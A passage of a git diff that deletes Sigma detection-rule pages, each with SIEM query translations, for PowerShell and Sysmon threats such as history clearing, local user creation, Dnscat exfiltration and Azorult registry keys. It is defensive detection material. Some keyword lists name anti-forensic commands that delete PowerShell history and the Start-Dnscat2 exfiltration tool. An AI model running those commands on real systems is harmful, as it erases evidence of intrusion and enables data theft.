-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:(\"12\" OR \"13\") AND winlog.event_data.TargetObject.keyword:(*SYSTEM\\\\*\\\\services\\\\localNETService))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:(\"12\" OR \"13\") AND winlog.event_data.TargetObject.keyword:(*SYSTEM\\\\*\\\\services\\\\localNETService))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Registy Entries For Azorult Malware'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n        Image = {{_source.Image}}\n TargetObject = {{_source.TargetObject}}\nTargetDetails = {{_source.TargetDetails}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:("12" "13") AND TargetObject.keyword:(*SYSTEM\\*\\services\\localNETService))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" (EventCode="12" OR EventCode="13") (TargetObject="*SYSTEM\\*\\services\\localNETService")) | table Image,TargetObject,TargetDetails
-```
-
-
-### logpoint
-    
-```
-(event_id IN ["12", "13"] TargetObject IN ["*SYSTEM\\*\\services\\localNETService"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*12|.*13))(?=.*(?:.*.*SYSTEM\\.*\services\localNETService)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_alternate_powershell_hosts.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_alternate_powershell_hosts.md
deleted file mode 100644
index c50ffd0..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_alternate_powershell_hosts.md
+++ /dev/null
@@ -1,185 +0,0 @@
-| Title                    | Alternate PowerShell Hosts       |
-|:-------------------------|:------------------|
-| **Description**          | Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Programs using PowerShell directly without invocation of a dedicated interpreter</li><li>MSP Detection Searcher</li><li>Citrix ConfigSync.ps1</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/02_execution/T1086_powershell/alternate_signed_powershell_hosts.md](https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/02_execution/T1086_powershell/alternate_signed_powershell_hosts.md)</li></ul>  |
-| **Author**               | Roberto Rodriguez @Cyb3rWard0g |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Alternate PowerShell Hosts
-id: 64e8e417-c19a-475a-8d19-98ea705394cc
-description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
-status: experimental
-date: 2019/08/11
-modified: 2020/02/25
-author: Roberto Rodriguez @Cyb3rWard0g
-references:
-    - https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/02_execution/T1086_powershell/alternate_signed_powershell_hosts.md
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-logsource:
-    product: windows
-    service: powershell
-detection:
-    selection:
-        EventID:
-            - 4103
-            - 400
-        ContextInfo: '*'
-    filter:
-        - ContextInfo: 'powershell.exe'
-        - Message: 'powershell.exe'
-        # Both fields contain key=value pairs where the key HostApplication ist relevant but
-        # can't be referred directly as event field.
-    condition: selection and not filter
-falsepositives:
-    - Programs using PowerShell directly without invocation of a dedicated interpreter
-    - MSP Detection Searcher
-    - Citrix ConfigSync.ps1
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | where {((($_.ID -eq "4103" -or $_.ID -eq "400") -and $_.message -match "ContextInfo.*.*") -and  -not ($_.message -match "ContextInfo.*powershell.exe" -or $_.message -match "Message.*powershell.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_id:("4103" OR "400") AND ContextInfo.keyword:*) AND (NOT (ContextInfo:"powershell.exe" OR Message:"powershell.exe")))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/64e8e417-c19a-475a-8d19-98ea705394cc <<EOF
-{
-  "metadata": {
-    "title": "Alternate PowerShell Hosts",
-    "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "((winlog.event_id:(\"4103\" OR \"400\") AND ContextInfo.keyword:*) AND (NOT (ContextInfo:\"powershell.exe\" OR Message:\"powershell.exe\")))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_id:(\"4103\" OR \"400\") AND ContextInfo.keyword:*) AND (NOT (ContextInfo:\"powershell.exe\" OR Message:\"powershell.exe\")))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Alternate PowerShell Hosts'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:("4103" "400") AND ContextInfo.keyword:*) AND (NOT (ContextInfo:"powershell.exe" OR Message:"powershell.exe")))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-PowerShell/Operational" ((EventCode="4103" OR EventCode="400") ContextInfo="*") NOT (ContextInfo="powershell.exe" OR Message="powershell.exe"))
-```
-
-
-### logpoint
-    
-```
-((event_id IN ["4103", "400"] ContextInfo="*")  -(ContextInfo="powershell.exe" OR Message="powershell.exe"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*(?:.*4103|.*400))(?=.*.*)))(?=.*(?!.*(?:.*(?:.*(?=.*powershell\.exe)|.*(?=.*powershell\.exe))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_clear_powershell_history.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_clear_powershell_history.md
deleted file mode 100644
index d3f715a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_clear_powershell_history.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | Clear PowerShell History       |
-|:-------------------------|:------------------|
-| **Description**          | Detects keywords that could indicate clearing PowerShell history |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1146: Clear Command History](https://attack.mitre.org/techniques/T1146)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0036_4104_windows_powershell_script_block](../Data_Needed/DN0036_4104_windows_powershell_script_block.md)</li><li>[DN0037_4103_windows_powershell_executing_pipeline](../Data_Needed/DN0037_4103_windows_powershell_executing_pipeline.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>some PS-scripts</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a](https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a)</li></ul>  |
-| **Author**               | Ilyas Ochkov, oscd.community |
-| Other Tags           | <ul><li>attack.t1551.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Clear PowerShell History
-id: dfba4ce1-e0ea-495f-986e-97140f31af2d
-status: experimental
-description: Detects keywords that could indicate clearing PowerShell history
-date: 2019/10/25
-author: Ilyas Ochkov, oscd.community
-references:
-    - https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a
-tags:
-    - attack.defense_evasion
-    - attack.t1146
-    - attack.t1551.003
-logsource:
-    product: windows
-    service: powershell
-detection:
-    keywords:
-        - 'del (Get-PSReadlineOption).HistorySavePath'
-        - 'Set-PSReadlineOption –HistorySaveStyle SaveNothing'
-        - 'Remove-Item (Get-PSReadlineOption).HistorySavePath'
-        - 'rm (Get-PSReadlineOption).HistorySavePath'
-    condition: keywords
-falsepositives:
-    - some PS-scripts
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | where {(($_.message -match "del (Get-PSReadlineOption).HistorySavePath" -or $_.message -match "Set-PSReadlineOption –HistorySaveStyle SaveNothing" -or $_.message -match "Remove-Item (Get-PSReadlineOption).HistorySavePath" -or $_.message -match "rm (Get-PSReadlineOption).HistorySavePath")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-\*.keyword:(*del\ \(Get\-PSReadlineOption\).HistorySavePath* OR *Set\-PSReadlineOption\ –HistorySaveStyle\ SaveNothing* OR *Remove\-Item\ \(Get\-PSReadlineOption\).HistorySavePath* OR *rm\ \(Get\-PSReadlineOption\).HistorySavePath*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/dfba4ce1-e0ea-495f-986e-97140f31af2d <<EOF
-{
-  "metadata": {
-    "title": "Clear PowerShell History",
-    "description": "Detects keywords that could indicate clearing PowerShell history",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1146",
-      "attack.t1551.003"
-    ],
-    "query": "\\*.keyword:(*del\\ \\(Get\\-PSReadlineOption\\).HistorySavePath* OR *Set\\-PSReadlineOption\\ \u2013HistorySaveStyle\\ SaveNothing* OR *Remove\\-Item\\ \\(Get\\-PSReadlineOption\\).HistorySavePath* OR *rm\\ \\(Get\\-PSReadlineOption\\).HistorySavePath*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "\\*.keyword:(*del\\ \\(Get\\-PSReadlineOption\\).HistorySavePath* OR *Set\\-PSReadlineOption\\ \u2013HistorySaveStyle\\ SaveNothing* OR *Remove\\-Item\\ \\(Get\\-PSReadlineOption\\).HistorySavePath* OR *rm\\ \\(Get\\-PSReadlineOption\\).HistorySavePath*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Clear PowerShell History'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-\*.keyword:(*del \(Get\-PSReadlineOption\).HistorySavePath* OR *Set\-PSReadlineOption –HistorySaveStyle SaveNothing* OR *Remove\-Item \(Get\-PSReadlineOption\).HistorySavePath* OR *rm \(Get\-PSReadlineOption\).HistorySavePath*)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-PowerShell/Operational" ("del (Get-PSReadlineOption).HistorySavePath" OR "Set-PSReadlineOption –HistorySaveStyle SaveNothing" OR "Remove-Item (Get-PSReadlineOption).HistorySavePath" OR "rm (Get-PSReadlineOption).HistorySavePath"))
-```
-
-
-### logpoint
-    
-```
-("del (Get-PSReadlineOption).HistorySavePath" OR "Set-PSReadlineOption –HistorySaveStyle SaveNothing" OR "Remove-Item (Get-PSReadlineOption).HistorySavePath" OR "rm (Get-PSReadlineOption).HistorySavePath")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*del \(Get-PSReadlineOption\)\.HistorySavePath|.*Set-PSReadlineOption –HistorySaveStyle SaveNothing|.*Remove-Item \(Get-PSReadlineOption\)\.HistorySavePath|.*rm \(Get-PSReadlineOption\)\.HistorySavePath))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_create_local_user.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_create_local_user.md
deleted file mode 100644
index 49c26f6..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_create_local_user.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | PowerShell Create Local User       |
-|:-------------------------|:------------------|
-| **Description**          | Detects creation of a local user via PowerShell |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li><li>[T1136: Create Account](https://attack.mitre.org/techniques/T1136)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate user creation</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md)</li></ul>  |
-| **Author**               | @ROxPinTeddy |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: PowerShell Create Local User
-id: 243de76f-4725-4f2e-8225-a8a69b15ad61
-status: experimental
-description: Detects creation of a local user via PowerShell
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.persistence
-    - attack.t1136
-    - attack.t1059.001
-author: '@ROxPinTeddy'
-date: 2020/04/11
-logsource:
-    product: windows
-    service: powershell
-detection:
-    selection:
-        EventID: 4104
-        Message|contains:
-            - 'New-LocalUser'
-    condition: selection
-falsepositives:
-    - Legitimate user creation
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | where {($_.ID -eq "4104" -and ($_.message -match "Message.*.*New-LocalUser.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:"4104" AND Message.keyword:(*New\-LocalUser*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/243de76f-4725-4f2e-8225-a8a69b15ad61 <<EOF
-{
-  "metadata": {
-    "title": "PowerShell Create Local User",
-    "description": "Detects creation of a local user via PowerShell",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.persistence",
-      "attack.t1136",
-      "attack.t1059.001"
-    ],
-    "query": "(winlog.event_id:\"4104\" AND Message.keyword:(*New\\-LocalUser*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"4104\" AND Message.keyword:(*New\\-LocalUser*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'PowerShell Create Local User'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4104" AND Message.keyword:(*New\-LocalUser*))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode="4104" (Message="*New-LocalUser*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="4104" Message IN ["*New-LocalUser*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4104)(?=.*(?:.*.*New-LocalUser.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_data_compressed.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_data_compressed.md
deleted file mode 100644
index 302ad3a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_data_compressed.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | Data Compressed - Powershell       |
-|:-------------------------|:------------------|
-| **Description**          | An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0010: Exfiltration](https://attack.mitre.org/tactics/TA0010)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1002: Data Compressed](https://attack.mitre.org/techniques/T1002)</li><li>[T1560: Archive Collected Data](https://attack.mitre.org/techniques/T1560)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1560: Archive Collected Data](../Triggers/T1560.md)</li></ul>  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>highly likely if archive ops are done via PS</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1002/T1002.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1002/T1002.yaml)</li></ul>  |
-| **Author**               | Timur Zinniatullin, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Data Compressed - Powershell
-id: 6dc5d284-69ea-42cf-9311-fb1c3932a69a
-status: experimental
-description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network
-author: Timur Zinniatullin, oscd.community
-date: 2019/10/21
-modified: 2019/11/04
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1002/T1002.yaml
-logsource:
-    product: windows
-    service: powershell
-    description: 'Script block logging must be enabled'
-detection:
-    selection:
-        EventID: 4104
-        keywords|contains|all:
-            - '-Recurse'
-            - '|'
-            - 'Compress-Archive'
-    condition: selection
-falsepositives:
-    - highly likely if archive ops are done via PS
-level: low
-tags:
-    - attack.exfiltration
-    - attack.t1002
-    - attack.t1560
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | where {($_.ID -eq "4104" -and $_.message -match "keywords.*.*-Recurse.*" -and $_.message -match "keywords.*.*|.*" -and $_.message -match "keywords.*.*Compress-Archive.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:"4104" AND keywords.keyword:*\-Recurse* AND keywords.keyword:*|* AND keywords.keyword:*Compress\-Archive*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/6dc5d284-69ea-42cf-9311-fb1c3932a69a <<EOF
-{
-  "metadata": {
-    "title": "Data Compressed - Powershell",
-    "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network",
-    "tags": [
-      "attack.exfiltration",
-      "attack.t1002",
-      "attack.t1560"
-    ],
-    "query": "(winlog.event_id:\"4104\" AND keywords.keyword:*\\-Recurse* AND keywords.keyword:*|* AND keywords.keyword:*Compress\\-Archive*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"4104\" AND keywords.keyword:*\\-Recurse* AND keywords.keyword:*|* AND keywords.keyword:*Compress\\-Archive*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Data Compressed - Powershell'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4104" AND keywords.keyword:*\-Recurse* AND keywords.keyword:*|* AND keywords.keyword:*Compress\-Archive*)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode="4104" keywords="*-Recurse*" keywords="*|*" keywords="*Compress-Archive*")
-```
-
-
-### logpoint
-    
-```
-(event_id="4104" keywords="*-Recurse*" keywords="*|*" keywords="*Compress-Archive*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4104)(?=.*.*-Recurse.*)(?=.*.*\|.*)(?=.*.*Compress-Archive.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_dnscat_execution.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_dnscat_execution.md
deleted file mode 100644
index b7bb491..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_dnscat_execution.md
+++ /dev/null
@@ -1,171 +0,0 @@
-| Title                    | Dnscat Execution       |
-|:-------------------------|:------------------|
-| **Description**          | Dnscat exfiltration tool execution |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0010: Exfiltration](https://attack.mitre.org/tactics/TA0010)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1048: Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1048: Exfiltration Over Alternative Protocol](../Triggers/T1048.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Daniil Yugoslavskiy, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Dnscat Execution
-id: a6d67db4-6220-436d-8afc-f3842fe05d43
-description: Dnscat exfiltration tool execution
-status: experimental
-author: Daniil Yugoslavskiy, oscd.community
-date: 2019/10/24
-tags:
-    - attack.exfiltration
-    - attack.t1048
-logsource:
-    product: windows
-    service: powershell
-detection:
-    selection:
-        EventID: 4104
-        ScriptBlockText|contains: "Start-Dnscat2"
-    condition: selection
-falsepositives:
-    - Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | where {($_.ID -eq "4104" -and $_.message -match "ScriptBlockText.*.*Start-Dnscat2.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:"4104" AND ScriptBlockText.keyword:*Start\-Dnscat2*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/a6d67db4-6220-436d-8afc-f3842fe05d43 <<EOF
-{
-  "metadata": {
-    "title": "Dnscat Execution",
-    "description": "Dnscat exfiltration tool execution",
-    "tags": [
-      "attack.exfiltration",
-      "attack.t1048"
-    ],
-    "query": "(winlog.event_id:\"4104\" AND ScriptBlockText.keyword:*Start\\-Dnscat2*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"4104\" AND ScriptBlockText.keyword:*Start\\-Dnscat2*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Dnscat Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4104" AND ScriptBlockText.keyword:*Start\-Dnscat2*)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode="4104" ScriptBlockText="*Start-Dnscat2*")
-```
-
-
-### logpoint
-    
-```
-(event_id="4104" ScriptBlockText="*Start-Dnscat2*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4104)(?=.*.*Start-Dnscat2.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_downgrade_attack.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_downgrade_attack.md
deleted file mode 100644
index 8537550..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_downgrade_attack.md
+++ /dev/null
@@ -1,181 +0,0 @@
-| Title                    | PowerShell Downgrade Attack       |
-|:-------------------------|:------------------|
-| **Description**          | Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0 |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
